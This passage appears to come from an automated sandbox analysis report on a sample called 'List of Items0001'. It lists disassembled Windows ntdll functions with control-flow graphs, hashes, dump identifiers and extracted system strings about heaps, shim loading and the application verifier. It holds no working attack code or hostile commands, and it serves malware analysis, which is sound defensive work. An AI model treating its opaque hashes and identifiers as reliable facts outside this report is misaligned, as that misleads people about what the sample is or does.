                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798

                                                Execution Graph

                                                Execution Coverage:0%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:100%
                                                Total number of Nodes:1
                                                Total number of Limit Nodes:0
                                                execution_graph 39717 326a2b90 LdrInitializeThunk

                                                Executed Functions

                                                Function 326A34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2 326a34e0-326a34ec LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8ad7f34358e8244eaeaf09523ea533987f245d150c342c5a8db4109f1420944f
                                                • Instruction ID: 114aeab477aa2c938fb54460e60f7cc5d4766d45ac0076d14af1428cab60b2b7
                                                • Opcode Fuzzy Hash: 8ad7f34358e8244eaeaf09523ea533987f245d150c342c5a8db4109f1420944f
                                                • Instruction Fuzzy Hash: 9090023160520403DD006559571475620054FD0201F61D816A1424628DC7A5895576A2
                                                Function 326A2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 326a2b90-326a2b9c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bdd2a381809e241714778ffabab9c4b0432ed2b2213e66681a0e1c16a635e7a3
                                                • Instruction ID: d5c20981039f1883ce83b643c07548c66c2e87e44bdbf647b848eaed58e40191
                                                • Opcode Fuzzy Hash: bdd2a381809e241714778ffabab9c4b0432ed2b2213e66681a0e1c16a635e7a3
                                                • Instruction Fuzzy Hash: 0190023120118803DD106559970479A10054FD0301F55D816A5424718DC6A588957221
                                                Function 326A2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1 326a2d10-326a2d1c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 69baa80802fbc45b6402cfbd359bfc384b35394d8d5b0adb2ce43c2a3d9063c2
                                                • Instruction ID: 759df320bdb699121444ca480dd6f75b52d06d334498688766e3bdf58256c5b8
                                                • Opcode Fuzzy Hash: 69baa80802fbc45b6402cfbd359bfc384b35394d8d5b0adb2ce43c2a3d9063c2
                                                • Instruction Fuzzy Hash: F290023120110413DD116559570475710094FD0241F91D817A1424618DD6668956B221

                                                Non-executed Functions

                                                Function 32698540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 250 32698540-326985a1 251 326985a7-326985b8 250->251 252 326d50a2-326d50a8 250->252 252->251 253 326d50ae-326d50bb GetPEB 252->253 253->251 254 326d50c1-326d50c4 253->254 255 326d50c6-326d50d0 254->255 256 326d50e1-326d5107 call 326a2c00 254->256 255->251 257 326d50d6-326d50df 255->257 256->251 262 326d510d-326d5111 256->262 259 326d5138-326d514c call 326653c0 257->259 265 326d5152-326d515e 259->265 262->251 264 326d5117-326d512c call 326a2c00 262->264 264->251 273 326d5132 264->273 267 326d5164-326d5178 265->267 268 326d5367-326d5373 call 326d5378 265->268 271 326d517a 267->271 272 326d5196-326d520c 267->272 268->251 275 326d517c-326d5183 271->275 278 326d520e-326d5240 call 3265fcf0 272->278 279 326d5245-326d5248 272->279 273->259 275->272 277 326d5185-326d5187 275->277 282 326d518e-326d5190 277->282 283 326d5189-326d518c 277->283 292 326d5358-326d535d call 326ea130 278->292 280 326d531f-326d5322 279->280 281 326d524e-326d529f 279->281 286 326d5360-326d5362 280->286 287 326d5324-326d5353 call 3265fcf0 280->287 289 326d52d9-326d531d call 3265fcf0 * 2 281->289 290 326d52a1-326d52d7 call 3265fcf0 281->290 282->272 282->286 283->275 286->265 287->292 289->292 290->292 292->286
                                                Strings
                                                • Invalid debug info address of this critical section, xrefs: 326D52C1
                                                • double initialized or corrupted critical section, xrefs: 326D5313
                                                • 8, xrefs: 326D50EE
                                                • undeleted critical section in freed memory, xrefs: 326D5236
                                                • Critical section debug info address, xrefs: 326D522A, 326D5339
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 326D52ED
                                                • Thread identifier, xrefs: 326D5345
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 326D52D9
                                                • Critical section address., xrefs: 326D530D
                                                • corrupted critical section, xrefs: 326D52CD
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 326D5215, 326D52A1, 326D5324
                                                • Address of the debug info found in the active list., xrefs: 326D52B9, 326D5305
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 326D534E
                                                • Critical section address, xrefs: 326D5230, 326D52C7, 326D533F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                • API String ID: 0-2368682639
                                                • Opcode ID: 2513e4b02a74e42b1de30a07fd0fabd88e842001c85dda77722dd56ef947fbff
                                                • Instruction ID: 49532ec17363aa652bf96457a35158bf1bf237ea30eeb2a91eb0898b9d576915
                                                • Opcode Fuzzy Hash: 2513e4b02a74e42b1de30a07fd0fabd88e842001c85dda77722dd56ef947fbff
                                                • Instruction Fuzzy Hash: AE8199B0901348EFEB54CF94CC80BAEBBB9FF48724F204059E945B7640DB71A944CBA4
                                                Function 3265D2EC Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 444 3265d2ec-3265d32d 445 3265d333-3265d335 444->445 446 326ba69c 444->446 445->446 447 3265d33b-3265d33e 445->447 449 326ba6a6-326ba6bf call 3271bd08 446->449 447->446 448 3265d344-3265d34c 447->448 450 3265d356-3265d3a1 call 326a5050 call 326a2ab0 448->450 451 3265d34e-3265d350 448->451 458 326ba6c5-326ba6c8 449->458 459 3265d56a-3265d56d 449->459 468 3265d3a7-3265d3b0 450->468 469 326ba600-326ba61a call 32657220 450->469 451->450 453 326ba5f6-326ba5fb 451->453 457 3265d5c0-3265d5c8 453->457 460 3265d54d-3265d54f 458->460 462 3265d56f-3265d575 459->462 460->459 464 3265d551-3265d564 call 32683262 460->464 465 3265d63b-3265d63d 462->465 466 3265d57b-3265d588 GetPEB call 32673bc0 462->466 464->459 484 326ba6cd-326ba6d2 464->484 470 3265d58d-3265d592 465->470 466->470 474 3265d3b2-3265d3b4 468->474 475 3265d3ba-3265d3cd call 3265d736 468->475 488 326ba61c-326ba61e 469->488 489 326ba624-326ba628 469->489 472 3265d594-3265d59d call 326a2a80 470->472 473 3265d5a1-3265d5a6 470->473 472->473 480 3265d5b5-3265d5ba 473->480 481 3265d5a8-3265d5b1 call 326a2a80 473->481 474->475 479 326ba630-326ba63b call 3271ad61 474->479 494 326ba658 475->494 495 3265d3d3-3265d3d7 475->495 479->475 502 326ba641-326ba653 479->502 480->457 490 326ba6d7-326ba6db call 326a2a80 480->490 481->480 484->459 488->489 496 3265d52e 488->496 489->479 498 326ba6e0 490->498 503 326ba660-326ba662 494->503 500 3265d3dd-3265d3f7 call 3265d8d0 495->500 501 3265d5cb-3265d623 call 326a5050 call 326a2ab0 495->501 499 3265d530-3265d535 496->499 498->498 504 3265d537-3265d539 499->504 505 3265d549 499->505 500->503 512 3265d3fd-3265d44e call 326a5050 call 326a2ab0 500->512 517 3265d625 501->517 518 3265d642-3265d645 501->518 502->475 503->459 508 326ba668 503->508 504->449 509 3265d53f-3265d543 504->509 505->460 514 326ba66d 508->514 509->449 509->505 512->494 524 3265d454-3265d45d 512->524 520 326ba677-326ba67c 514->520 523 3265d62f-3265d636 517->523 518->496 520->465 523->499 524->514 525 3265d463-3265d492 call 326a5050 call 3265d64a 524->525 525->523 530 3265d498-3265d49e 525->530 530->523 531 3265d4a4-3265d4aa 530->531 531->465 532 3265d4b0-3265d4cc GetPEB call 32675d90 531->532 532->520 535 3265d4d2-3265d4ef call 3265d64a 532->535 538 3265d526-3265d52c 535->538 539 3265d4f1-3265d4f6 535->539 538->462 538->496 540 3265d4fc-3265d524 call 32684ca6 539->540 541 326ba681-326ba686 539->541 540->538 541->540 543 326ba68c-326ba697 541->543 543->499
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.h2
                                                • API String ID: 0-994927039
                                                • Opcode ID: d9e8c5557cfa995e3cdd1ec217a6adeb6df20ccf09495b8254061a7946db4063
                                                • Instruction ID: 3b30f81be67b50483e72ab5ddfc9148719d59dc98c29dcc270757a21126677f7
                                                • Opcode Fuzzy Hash: d9e8c5557cfa995e3cdd1ec217a6adeb6df20ccf09495b8254061a7946db4063
                                                • Instruction Fuzzy Hash: 08B18AB59083419FD715CF24C890B5FBBE8AF88758F60492EF98597281EB70DD48CB92
                                                Function 327086C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 669 327086c2-3270873a GetPEB call 32660670 672 32708740-3270875e call 326642b0 669->672 673 32708892-3270889a 669->673 678 32708760-32708779 call 326a7ad0 672->678 679 3270877f-32708787 672->679 675 3270889b-327088b0 call 326a4b50 673->675 678->673 678->679 682 327087b7-327087c0 679->682 683 32708789-3270879e call 32694f11 679->683 682->673 684 327087c6-327087c8 682->684 683->673 690 327087a4-327087ac 683->690 684->675 687 327087ce-327087dc 684->687 689 327087e8-327087ee 687->689 691 327087f0 689->691 692 327087de-327087e2 689->692 690->673 693 327087b2 690->693 696 3270884f-32708875 call 32694e50 691->696 694 327087f2-327087f4 692->694 695 327087e4-327087e5 692->695 693->675 694->696 698 327087f6-327087ff 694->698 695->689 696->675 701 32708877-32708890 call 326a7ad0 696->701 698->696 700 32708801-32708803 698->700 702 32708807-3270881b call 326a7ad0 700->702 701->673 701->675 707 32708839 702->707 708 3270881d 702->708 709 3270883d-3270884d 707->709 710 32708820-32708829 708->710 709->696 709->702 710->710 711 3270882b-32708835 710->711 711->673 712 32708837 711->712 712->709
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                • API String ID: 0-2515994595
                                                • Opcode ID: bb2813ddd36ea78b355ec3c199258fa47d64bde621e2394724bddf50b921af3b
                                                • Instruction ID: 0e85d8ce55d6a828c80cd9baa67b1f5d2491e6a87d4707972b27480b8706d13c
                                                • Opcode Fuzzy Hash: bb2813ddd36ea78b355ec3c199258fa47d64bde621e2394724bddf50b921af3b
                                                • Instruction Fuzzy Hash: 4051F0B15143019BD326CF14A941BABB7E9FF84354F04891DFA98CB180EB70E608CF9A
                                                Function 3270F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 824 3270f0a5-3270f0c7 call 326b7be4 827 3270f0e3-3270f0fb call 32657662 824->827 828 3270f0c9-3270f0de RtlDebugPrintTimes 824->828 833 3270f101-3270f11c 827->833 834 3270f3d2 827->834 832 3270f3e7-3270f3f6 828->832 835 3270f125-3270f137 833->835 836 3270f11e 833->836 837 3270f3d5-3270f3e4 call 3270f3f9 834->837 838 3270f139-3270f13b 835->838 839 3270f13c-3270f144 835->839 836->835 837->832 838->839 842 3270f350-3270f359 GetPEB 839->842 843 3270f14a-3270f14d 839->843 844 3270f378-3270f37d call 3265b910 842->844 845 3270f35b-3270f376 GetPEB call 3265b910 842->845 843->842 846 3270f153-3270f156 843->846 852 3270f382-3270f396 call 3265b910 844->852 845->852 849 3270f173-3270f196 call 32710835 call 32675d90 call 32710d24 846->849 850 3270f158-3270f170 call 3266fed0 846->850 849->837 863 3270f19c-3270f1a3 849->863 850->849 852->834 864 3270f1a5-3270f1ac 863->864 865 3270f1ae-3270f1b6 863->865 864->865 866 3270f1d4-3270f1d8 865->866 867 3270f1b8-3270f1c8 865->867 869 3270f208-3270f20e 866->869 870 3270f1da-3270f1ed call 32693ae9 866->870 867->866 868 3270f1ca-3270f1cf call 3271d646 867->868 868->866 871 3270f211-3270f21b 869->871 879 3270f1ff 870->879 880 3270f1ef-3270f1fd call 3268fdb9 870->880 874 3270f21d-3270f22d 871->874 875 3270f22f-3270f236 871->875 874->875 877 3270f241-3270f250 GetPEB 875->877 878 3270f238-3270f23c call 32710835 875->878 883 3270f252-3270f255 877->883 884 3270f2be-3270f2c9 877->884 878->877 881 3270f202-3270f206 879->881 880->881 881->871 888 3270f274-3270f279 call 3265b910 883->888 889 3270f257-3270f272 GetPEB call 3265b910 883->889 884->837 887 3270f2cf-3270f2d5 884->887 887->837 890 3270f2db-3270f2e2 887->890 893 3270f27e-3270f292 call 3265b910 888->893 889->893 890->837 894 3270f2e8-3270f2f3 890->894 901 3270f295-3270f29f GetPEB 893->901 894->837 897 3270f2f9-3270f302 GetPEB 894->897 899 3270f321-3270f326 call 3265b910 897->899 900 3270f304-3270f31f GetPEB call 3265b910 897->900 906 3270f32b-3270f34b call 3270823a call 3265b910 899->906 900->906 901->837 904 3270f2a5-3270f2b9 901->904 904->837 906->901
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                • API String ID: 3446177414-1745908468
                                                • Opcode ID: 02f0ed2df1cff909d8a3a1ae6703eae892ab3d8b7d34bd13eb879f170f5a05ec
                                                • Instruction ID: 541270c1efc7b9393ff593481914a3b12865034438c3824d77308b1b6011e0e7
                                                • Opcode Fuzzy Hash: 02f0ed2df1cff909d8a3a1ae6703eae892ab3d8b7d34bd13eb879f170f5a05ec
                                                • Instruction Fuzzy Hash: 0891FD35901645DFDB02CFA8C840A9EFBF2FF49324F28844AE844AB251CF7A9946CF55
                                                Function 3265640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 911 3265640d-3265646c call 32656c11 914 32656472-3265649e call 3267e8a6 call 32656b45 911->914 915 326b9770-326b9779 911->915 932 326564a4-326564a6 914->932 933 326b97e9-326b97f2 call 3268e7e0 914->933 917 326b977b-326b978d 915->917 918 326b97b3-326b97b6 915->918 919 326b97a0-326b97b0 call 326de692 917->919 920 326b97dd 918->920 919->918 923 32656542-3265654a 920->923 924 326b97e3-326b97e4 920->924 927 32656550-32656564 call 326a4b50 923->927 928 326b9827-326b982b call 3265ba80 923->928 924->923 934 326b9830 928->934 937 326564ac-326564d8 call 32697df6 call 3267d3e1 call 32656868 932->937 938 326b97f7-326b97fe 932->938 933->938 934->934 951 326b9802-326b980b 937->951 952 326564de-32656526 RtlDebugPrintTimes 937->952 939 326b97db 938->939 940 326b9800 call 326de692 938->940 939->920 940->939 951->918 953 326b980d 951->953 952->923 956 32656528-3265653c call 32656565 952->956 953->919 956->923 959 326b980f-326b9822 GetPEB call 32673bc0 956->959 959->923
                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 3265651C
                                                  • Part of subcall function 32656565: RtlDebugPrintTimes.NTDLL ref: 32656614
                                                  • Part of subcall function 32656565: RtlDebugPrintTimes.NTDLL ref: 3265665F
                                                Strings
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 326B97B9
                                                • LdrpInitShimEngine, xrefs: 326B9783, 326B9796, 326B97BF
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 326B9790
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 326B977C
                                                • apphelp.dll, xrefs: 32656446
                                                • minkernel\ntdll\ldrinit.c, xrefs: 326B97A0, 326B97C9
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-204845295
                                                • Opcode ID: fda7f551fb2ac8d5785e438dd4bef888344c13457578a5da9077e200df8b0158
                                                • Instruction ID: eb8cb2fac95fc37f1de47e6664f12f691c76b92b9c8c861edee9c1a1ff1c7ce8
                                                • Opcode Fuzzy Hash: fda7f551fb2ac8d5785e438dd4bef888344c13457578a5da9077e200df8b0158
                                                • Instruction Fuzzy Hash: 7651DE716493449BE714CF21C890A9BB7E8FF84758F600D29F685976A0DA70D944CF92
                                                Function 3268D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 3268D879
                                                  • Part of subcall function 32664779: RtlDebugPrintTimes.NTDLL ref: 32664817
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-1975516107
                                                • Opcode ID: e438a065582b1e4fd742f9847970b2c8e84265ab86d2255d2f26d6b4b29a3160
                                                • Instruction ID: 0fefb860523af9b0ffb933173718b1eb1adb6117ec80a50f02dbdb72bf74cfcb
                                                • Opcode Fuzzy Hash: e438a065582b1e4fd742f9847970b2c8e84265ab86d2255d2f26d6b4b29a3160
                                                • Instruction Fuzzy Hash: BB51E1B6A45345DFEB08CFB4C48478DFBB1BF44758F204459D8017B282DBB4A986CBA1
                                                Function 326E8633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                Download Yara Rule
                                                Strings
                                                • HandleTraces, xrefs: 326E890F
                                                • VerifierDebug, xrefs: 326E8925
                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 326E86BD
                                                • VerifierFlags, xrefs: 326E88D0
                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 326E86E7
                                                • VerifierDlls, xrefs: 326E893D
                                                • AVRF: -*- final list of providers -*- , xrefs: 326E880F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                • API String ID: 0-3223716464
                                                • Opcode ID: 1b965909a0808be561d173147a03d3066ce5d06480d6ab2ed59104c2ee160739
                                                • Instruction ID: 4da0ace04c1b6c2c254f35016c65edb7b3f0892dee486e0291f0b85b4d860f41
                                                • Opcode Fuzzy Hash: 1b965909a0808be561d173147a03d3066ce5d06480d6ab2ed59104c2ee160739
                                                • Instruction Fuzzy Hash: 4C9146B2943751EFE711CF289A80B5BB7A8FF40758F550858F9926B260CB709C05CBDA
                                                Function 3268237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpDynamicShimModule, xrefs: 326CA7A5
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 326CA79F
                                                • minkernel\ntdll\ldrinit.c, xrefs: 326CA7AF
                                                • DGc2, xrefs: 32682382
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DGc2$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2742881860
                                                • Opcode ID: 65d0dc6c171c2512defddfd949fe1c17d3b6c3cf07c0c23511f367c4e957321f
                                                • Instruction ID: 4e94c46687bdebc77c1cd4d396893b1b414596888617345e7a50d8b5a3f9fd6f
                                                • Opcode Fuzzy Hash: 65d0dc6c171c2512defddfd949fe1c17d3b6c3cf07c0c23511f367c4e957321f
                                                • Instruction Fuzzy Hash: 0E31287AA41250EBF714AF58CC91A5ABBB5FF80B54F340469E902B7250DBB46C82CB91
                                                Function 3265F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-523794902
                                                • Opcode ID: ddb7c4b5d1b649255e847b03f1af502fdabbb828c5525ffdbd6ca1c20ac05056
                                                • Instruction ID: 646942ac5d2019d3179a4e80c4564198e4c54ec778f45343b6a22fe66ccee9ee
                                                • Opcode Fuzzy Hash: ddb7c4b5d1b649255e847b03f1af502fdabbb828c5525ffdbd6ca1c20ac05056
                                                • Instruction Fuzzy Hash: 144200752083819FE709CF29C484B1ABBE9FF89348F24496DE885CB352DB74D841CB92
                                                Function 3268510F Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
